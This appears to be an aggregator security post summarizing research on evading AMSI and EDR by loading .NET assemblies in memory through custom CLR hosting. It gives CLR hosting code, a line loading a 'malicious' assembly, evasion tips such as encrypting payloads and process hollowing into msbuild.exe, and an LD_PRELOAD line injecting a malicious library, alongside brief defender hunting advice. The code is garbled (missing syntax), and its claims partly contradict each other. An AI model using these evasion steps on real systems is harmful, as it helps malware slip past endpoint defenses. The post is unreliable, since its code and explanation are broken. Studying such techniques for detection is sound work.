Listen to this Post
Link: AMSI Bypass Without AMSI Bypass
Researchers Itay Yashar and Omer Golan revisited an overlooked technique allowing .NET assemblies to load directly from memory without triggering AMSI (Antimalware Scan Interface). By customizing the CLR (Common Language Runtime) via hosting interfaces, they achieved fully silent execution, evading EDR (Endpoint Detection and Response) detection.
You Should Know:
1. Key Concepts
- AMSI Bypass: Traditionally, attackers patch or disable AMSI to evade detection. This method avoids direct AMSI manipulation.
- CLR Hosting: Custom CLR hosting allows loading .NET assemblies in-memory without disk writes.
- EDR Evasion: No suspicious API calls or file drops, reducing detection likelihood.
2. Practical Implementation
Step 1: Custom CLR Hosting Setup
Use ICLRMetaHost, ICLRRuntimeInfo, and `ICLRRuntimeHost` to load the CLR manually.
include <metahost.h>
pragma comment(lib, "mscoree.lib")
void LoadCLR() {
ICLRMetaHost pMetaHost = NULL;
ICLRRuntimeInfo pRuntimeInfo = NULL;
ICLRRuntimeHost pRuntimeHost = NULL;
CLRCreateInstance(CLSID_CLRMetaHost, IID_ICLRMetaHost, (LPVOID)&pMetaHost);
pMetaHost->GetRuntime(L"v4.0.30319", IID_ICLRRuntimeInfo, (LPVOID)&pRuntimeInfo);
pRuntimeInfo->GetInterface(CLSID_CLRRuntimeHost, IID_ICLRRuntimeHost, (LPVOID)&pRuntimeHost);
pRuntimeHost->Start();
}
Step 2: In-Memory Assembly Loading
Load a .NET assembly (`byte[]`) without touching disk:
byte[] assemblyBytes = GetMaliciousAssembly(); Assembly.Load(assemblyBytes);
Step 3: Bypassing AMSI Without Direct Patching
Since AMSI scans assembly loads via Assembly.Load, this method avoids AMSI hooks by using custom CLR hosting.
3. Detection Avoidance Techniques
- Avoid
Assembly.LoadFrom: Use low-level CLR APIs instead. - Obfuscate CLR Calls: Encrypt assembly bytes and decrypt in-memory.
- Process Hollowing: Inject into a trusted process (e.g.,
msbuild.exe).
4. Linux Equivalent (For Red Teamers)
While this is Windows-specific, Linux attackers can use:
Memory loading in Linux (e.g., via LD_PRELOAD) LD_PRELOAD=/path/to/malicious.so /bin/legitimate_program
What Undercode Say
This technique highlights how attackers bypass modern defenses without direct API manipulation. Defenders should:
– Monitor CLR hosting API calls (CLRCreateInstance, GetRuntime).
– Inspect unusual .NET assembly loads in memory.
– Use behavioral detection (e.g., unexpected CLR initialization).
For blue teams:
Hunt for suspicious CLR hosting
Get-WinEvent -LogName "Microsoft-Windows-DotNETRuntime/Start" | Where-Object { $_.Message -match "ICLRMetaHost" }
Expected Output:
A stealthy .NET loader that evades AMSI and EDR by leveraging custom CLR hosting.
Prediction
Future EDRs will likely enhance CLR telemetry, forcing attackers to use even lower-level techniques (e.g., direct CLR manipulation via unmanaged code).
IT/Security Reporter URL:
Reported By: Omer Golan – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
